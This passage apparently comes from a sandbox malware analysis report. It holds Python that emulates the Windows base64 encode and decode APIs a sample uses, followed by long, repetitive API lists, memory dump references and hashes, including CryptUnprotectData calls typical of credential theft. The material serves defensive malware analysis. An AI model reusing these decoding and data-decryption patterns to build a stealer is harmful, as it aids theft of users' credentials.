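_LINE_LEN = 64  # CryptBinaryToStringA wraps base64 output at 64 characters unless NOCRLF is set


def describe_flags(flags: int) -> list[str]:
    """Turn a dwFlags value such as 0x40000001 into symbolic names; unknown bits are kept as hex."""
    names = [name for bit, name in _FLAG_NAMES.items() if flags & bit]
    unknown = flags & ~sum(_FLAG_NAMES)
    if unknown:
        names.append(f"0x{unknown:08X}")
    return names


def crypt_binary_to_string(data: bytes, flags: int) -> str:
    """Emulate CryptBinaryToStringA(data, len, CRYPT_STRING_BASE64[|CRYPT_STRING_NOCRLF], ...)."""
    if (flags & 0xFF) != CRYPT_STRING_BASE64:
        raise NotImplementedError("only the CRYPT_STRING_BASE64 format is emulated here")
    b64 = base64.b64encode(data).decode("ascii")
    if flags & CRYPT_STRING_NOCRLF:
        return b64
    # Default behaviour: CRLF after every 64 characters, including a terminating CRLF.
    lines = [b64[i:i + _LINE_LEN] for i in range(0, len(b64), _LINE_LEN)]
    return "".join(line + "\r\n" for line in lines)


def crypt_string_to_binary(text: str, flags: int) -> bytes:
    """Emulate CryptStringToBinaryA with CRYPT_STRING_BASE64: whitespace and CRLF are skipped."""
    if (flags & 0xFF) != CRYPT_STRING_BASE64:
        raise NotImplementedError("only the CRYPT_STRING_BASE64 format is emulated here")
    compact = "".join(text.split())
    return base64.b64decode(compact, validate=True)


def decode_like_sample(text: str) -> bytes:
    """The two-call idiom seen at 00329AEF / 00329B2A.

    First call with pbBinary == NULL only returns the needed size in *pcbBinary; the
    buffer is then allocated (LocalAlloc at 00329B01) and the second call fills it.
    """
    needed = len(crypt_string_to_binary(text, CRYPT_STRING_BASE64))  # sizing call
    buf = bytearray(needed)                                            # LocalAlloc(LPTR, needed)
    buf[:] = crypt_string_to_binary(text, CRYPT_STRING_BASE64)        # decoding call writes into buf
    return bytes(buf)
```

                               When matching this sample's encoded output elsewhere (a dump, a proxy log, a C2 request body), the presence or absence of the 64-column CRLF wrapping tells you which of the two flag values produced it, and a decoder written against the wrong one fails on the first embedded line break unless it strips whitespace the way CryptStringToBinaryA does.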
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,0109E5F0,00000000,?,00340E10,00000000,?,00000000,00000000), ref: 00337A63
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00337A6A
                              • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,0109E5F0,00000000,?,00340E10,00000000,?,00000000,00000000,?), ref: 00337A7D
                              • wsprintfA.USER32 ref: 00337AB7
                              Memory Dump Source
                              • Source File: 00000000.00000002.1734754441.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                               • Associated: 00000000.00000002.1734730369.0000000000320000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1734754441.00000000003D1000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1734754441.00000000003DD000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1734754441.0000000000402000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1734754441.000000000056A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735090731.000000000057E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735090731.00000000006FE000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735090731.00000000007D8000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735090731.00000000007FB000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735090731.0000000000802000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735090731.0000000000811000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735549081.0000000000812000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735665978.00000000009A6000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735682673.00000000009A7000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_320000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                              • String ID:
                              • API String ID: 3317088062-0
                              • Opcode ID: 1a45c6691eaae772dcf78ad1437dccb19e1613d8a0f38e8d37d449e09ce82338
                              • Instruction ID: 48d137b320e62d306b2fec151bdcf6f30bd86d2e2fdc3b8e71455e82e33e307f
                              • Opcode Fuzzy Hash: 1a45c6691eaae772dcf78ad1437dccb19e1613d8a0f38e8d37d449e09ce82338
                              • Instruction Fuzzy Hash: AE1182B1D45218DBEB208B58DC45F99B778FB04711F104395E516A32D0C7745A44CF51
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1735090731.000000000057E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                               • Associated: 00000000.00000002.1734730369.0000000000320000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1734754441.0000000000321000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1734754441.00000000003D1000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1734754441.00000000003DD000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1734754441.0000000000402000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1734754441.000000000056A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735090731.00000000006FE000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735090731.00000000007D8000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735090731.00000000007FB000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735090731.0000000000802000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735090731.0000000000811000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735549081.0000000000812000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735665978.00000000009A6000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735682673.00000000009A7000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_320000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: e3$S9_{$e[z
                              • API String ID: 0-1062808939
                              • Opcode ID: b9d106799fe2239887f3ec9a9751e1d14ebc57972001d9e2c8fa1a7b91ecb829
                              • Instruction ID: d54a2e75efcc539f9fd6f6ae505dbe6773d6256c89cd85601ad54322ae9443d6
                              • Opcode Fuzzy Hash: b9d106799fe2239887f3ec9a9751e1d14ebc57972001d9e2c8fa1a7b91ecb829
                              • Instruction Fuzzy Hash: D9B216F3A0C2109FE3086E2DEC5577ABBE9EF94320F1A493DEAC5C3744E63558058696
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1735090731.000000000057E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                               • Associated: 00000000.00000002.1734730369.0000000000320000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1734754441.0000000000321000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1734754441.00000000003D1000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1734754441.00000000003DD000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1734754441.0000000000402000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1734754441.000000000056A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735090731.00000000006FE000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735090731.00000000007D8000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735090731.00000000007FB000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735090731.0000000000802000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735090731.0000000000811000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735549081.0000000000812000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735665978.00000000009A6000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735682673.00000000009A7000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_320000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: 4@I<$BK$\4FL
                              • API String ID: 0-1039229860
                              • Opcode ID: d20613acaa7a38e068f1d945d2b7f365e3ea64044493e82aec3a5d5c1bf3c248
                              • Instruction ID: 757a361e175d871cbc515e6231264d3d71afbab6a1090ef6e9b7a01f43d62ae3
                              • Opcode Fuzzy Hash: d20613acaa7a38e068f1d945d2b7f365e3ea64044493e82aec3a5d5c1bf3c248
                              • Instruction Fuzzy Hash: 085238F360C204AFE7046E2DEC8567ABBE9EFD4320F16492DE6C4C7744EA3558018697
                              APIs
                              • CoCreateInstance.COMBASE(0033E118,00000000,00000001,0033E108,00000000), ref: 00333758
                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 003337B0
                              Memory Dump Source
                              • Source File: 00000000.00000002.1734754441.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                               • Associated: 00000000.00000002.1734730369.0000000000320000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1734754441.00000000003D1000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1734754441.00000000003DD000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1734754441.0000000000402000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1734754441.000000000056A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735090731.000000000057E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735090731.00000000006FE000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735090731.00000000007D8000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735090731.00000000007FB000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735090731.0000000000802000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735090731.0000000000811000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735549081.0000000000812000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735665978.00000000009A6000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735682673.00000000009A7000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_320000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: ByteCharCreateInstanceMultiWide
                              • String ID:
                              • API String ID: 123533781-0
                              • Opcode ID: 7c791aecea633b4bd28298838a6212e9ad64ce594b5b2ea8c8d1c95202c48bd0
                              • Instruction ID: a6c6b377487e842f2882ca38eceeb9f06a4a991f9dffc9d548a041bbf83c88ea
                              • Opcode Fuzzy Hash: 7c791aecea633b4bd28298838a6212e9ad64ce594b5b2ea8c8d1c95202c48bd0
                              • Instruction Fuzzy Hash: 4941C774A40A289FDB24DB58CC95FDBB7B5BB48702F4081D8E609AB2D0D7B16E85CF50
                              APIs
                              • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00329B84
                              • LocalAlloc.KERNEL32(00000040,00000000), ref: 00329BA3
                              • LocalFree.KERNEL32(?), ref: 00329BD3
                              Memory Dump Source
                              • Source File: 00000000.00000002.1734754441.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                               • Associated: 00000000.00000002.1734730369.0000000000320000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1734754441.00000000003D1000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1734754441.00000000003DD000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1734754441.0000000000402000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1734754441.000000000056A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735090731.000000000057E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735090731.00000000006FE000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735090731.00000000007D8000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735090731.00000000007FB000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735090731.0000000000802000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735090731.0000000000811000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735549081.0000000000812000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735665978.00000000009A6000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735682673.00000000009A7000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_320000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Local$AllocCryptDataFreeUnprotect
                              • String ID:
                              • API String ID: 2068576380-0
                              • Opcode ID: 57795c5f50eb44f3c337fd64dc674bc4eac6cbf6d7cbe325275c90374242c6bc
                              • Instruction ID: 68664292ec27834cb89f96bdb548b4a45a51587c0cbb889441206faba67daf1e
                              • Opcode Fuzzy Hash: 57795c5f50eb44f3c337fd64dc674bc4eac6cbf6d7cbe325275c90374242c6bc
                              • Instruction Fuzzy Hash: 2311CCB8A00209DFDB05DF98D989AAE77B5FF88300F104559F915A7350D774AE14CFA1
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1735090731.000000000057E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                               • Associated: 00000000.00000002.1734730369.0000000000320000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1734754441.0000000000321000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1734754441.00000000003D1000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1734754441.00000000003DD000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1734754441.0000000000402000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1734754441.000000000056A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735090731.00000000006FE000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735090731.00000000007D8000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735090731.00000000007FB000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735090731.0000000000802000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735090731.0000000000811000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735549081.0000000000812000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735665978.00000000009A6000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735682673.00000000009A7000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_320000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: %^h$K@=
                              • API String ID: 0-2285590521
                              • Opcode ID: 9e907fc9eab6fd7cb8f5b423093bf7582bf7d1e27b378de91f78ddfa9eae6ee7
                              • Instruction ID: a7bcdee01b3890b962aaed9c40d110483975ce7f641aa12093d276ca248d0cee
                              • Opcode Fuzzy Hash: 9e907fc9eab6fd7cb8f5b423093bf7582bf7d1e27b378de91f78ddfa9eae6ee7
                              • Instruction Fuzzy Hash: 1CA209F360C2049FE304AE2DEC8567ABBE5EF94720F1A853DE6C4C3744EA3598058697
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1735090731.000000000057E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                               • Associated: 00000000.00000002.1734730369.0000000000320000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1734754441.0000000000321000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1734754441.00000000003D1000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1734754441.00000000003DD000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1734754441.0000000000402000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1734754441.000000000056A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735090731.00000000006FE000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735090731.00000000007D8000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735090731.00000000007FB000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735090731.0000000000802000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735090731.0000000000811000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735549081.0000000000812000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735665978.00000000009A6000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735682673.00000000009A7000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_320000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: <"~$T{
                              • API String ID: 0-1865613160
                              • Opcode ID: e41beca78ed26038ea7a4f1d0a6dba77d52f3302b88ad0cd3031384d46ba89b7
                              • Instruction ID: dfd44b2db8a93a32b208011a87ac16d01101934e72234d3d7432ca4d2b23f2de
                              • Opcode Fuzzy Hash: e41beca78ed26038ea7a4f1d0a6dba77d52f3302b88ad0cd3031384d46ba89b7
                              • Instruction Fuzzy Hash: 4F423BF3A0C2009FE3046E2DEC8567AF7E9EB94320F1A463DEAC4D7740EA3558158697
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1735090731.000000000057E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                               • Associated: 00000000.00000002.1734730369.0000000000320000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1734754441.0000000000321000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1734754441.00000000003D1000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1734754441.00000000003DD000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1734754441.0000000000402000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1734754441.000000000056A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735090731.00000000006FE000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735090731.00000000007D8000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735090731.00000000007FB000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735090731.0000000000802000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735090731.0000000000811000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735549081.0000000000812000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735665978.00000000009A6000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735682673.00000000009A7000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_320000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: TP~$qC~}
                              • API String ID: 0-3457400484
                              • Opcode ID: 1737ff59433949f0aa1133dccc09c58cedf6c0ffef3404abcafec0234c876b1f
                              • Instruction ID: f53383b56e30554e2f60e5c2c8d4497635b9d6fbc61e013bb9e8b3f6b94e55d5
                              • Opcode Fuzzy Hash: 1737ff59433949f0aa1133dccc09c58cedf6c0ffef3404abcafec0234c876b1f
                              • Instruction Fuzzy Hash: 225157F3A081105FE3486A29DC557BBB7D7EBD4724F16463DE689D7384E9394C028291
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1735090731.000000000057E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                               • Associated: 00000000.00000002.1734730369.0000000000320000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1734754441.0000000000321000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1734754441.00000000003D1000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1734754441.00000000003DD000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1734754441.0000000000402000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1734754441.000000000056A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735090731.00000000006FE000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735090731.00000000007D8000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735090731.00000000007FB000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735090731.0000000000802000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735090731.0000000000811000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735549081.0000000000812000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735665978.00000000009A6000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735682673.00000000009A7000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_320000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: x
                              • API String ID: 0-1128350533
                              • Opcode ID: 72ba0d73e8c9128928b8a87a904af05e7f829885e73585aa31f160452a3f178d
                              • Instruction ID: e6c84887ee5486d9b634835a8b9eb2c2cb0e013e0dc059be15afc92e10bfcf91
                              • Opcode Fuzzy Hash: 72ba0d73e8c9128928b8a87a904af05e7f829885e73585aa31f160452a3f178d
                              • Instruction Fuzzy Hash: D822D2F360C3009FE704AF29EC8576ABBE5EF94320F16893DE6C583744E63598458A87
                              Memory Dump Source
                              • Source File: 00000000.00000002.1735090731.000000000057E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                               • Associated: 00000000.00000002.1734730369.0000000000320000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1734754441.0000000000321000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1734754441.00000000003D1000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1734754441.00000000003DD000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1734754441.0000000000402000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1734754441.000000000056A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735090731.00000000006FE000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735090731.00000000007D8000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735090731.00000000007FB000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735090731.0000000000802000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735090731.0000000000811000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735549081.0000000000812000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735665978.00000000009A6000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735682673.00000000009A7000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_320000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 1bf99f64b1b80e6bf2ee3a3665a96511f6930ec86aea9be9bc173573c8d0e3fc
                              • Instruction ID: 6e60031dda65b0f95e0d0bbea0267ed192ba494f01ca76d007f6950d56f8fcc6
                              • Opcode Fuzzy Hash: 1bf99f64b1b80e6bf2ee3a3665a96511f6930ec86aea9be9bc173573c8d0e3fc
                              • Instruction Fuzzy Hash: C96102F3E082149BE3046A28EC8477ABBD5EB94320F2A453DDBC497780EA7D1C558696
                              Memory Dump Source
                              • Source File: 00000000.00000002.1735090731.000000000057E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                               • Associated: 00000000.00000002.1734730369.0000000000320000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1734754441.0000000000321000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1734754441.00000000003D1000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1734754441.00000000003DD000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1734754441.0000000000402000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1734754441.000000000056A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735090731.00000000006FE000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735090731.00000000007D8000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735090731.00000000007FB000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735090731.0000000000802000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735090731.0000000000811000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735549081.0000000000812000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735665978.00000000009A6000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735682673.00000000009A7000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_320000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 312d996d7dff0a762c62b90cdb7f406ef5ae2140a2894fa90b532742f999fd34
                              • Instruction ID: 0ecedddd30f71b9fb6e4e464aa653c11e517fd5e86dc3b82f66f2fce53d69c6e
                              • Opcode Fuzzy Hash: 312d996d7dff0a762c62b90cdb7f406ef5ae2140a2894fa90b532742f999fd34
                              • Instruction Fuzzy Hash: E2515AF3E082009BE3046E3CEC5576ABBD5EB94320F2B453DEAC9D3784E97959058786
                              Memory Dump Source
                              • Source File: 00000000.00000002.1735090731.000000000057E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                               • Associated: 00000000.00000002.1734730369.0000000000320000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1734754441.0000000000321000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1734754441.00000000003D1000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1734754441.00000000003DD000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1734754441.0000000000402000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1734754441.000000000056A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735090731.00000000006FE000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735090731.00000000007D8000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735090731.00000000007FB000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735090731.0000000000802000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735090731.0000000000811000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735549081.0000000000812000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735665978.00000000009A6000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735682673.00000000009A7000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_320000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: f21330d6e5d32c65980ebde1e4bbbca7348e6f496367503dbdb84f662b252764
                              • Instruction ID: 854f06250d8189c878489417babda79efad0609314d733f8ea43922fd17d518b
                              • Opcode Fuzzy Hash: f21330d6e5d32c65980ebde1e4bbbca7348e6f496367503dbdb84f662b252764
                              • Instruction Fuzzy Hash: 483107F3F543245BF354487DED847A66AC6D7A4360F2F8639AA88E7BC4E4BD8D054280
                              Memory Dump Source
                              • Source File: 00000000.00000002.1734754441.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                              • Associated: 00000000.00000002.1734730369.0000000000320000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1734754441.00000000003D1000.00000040.00000001.01000000.00000003.sdmp
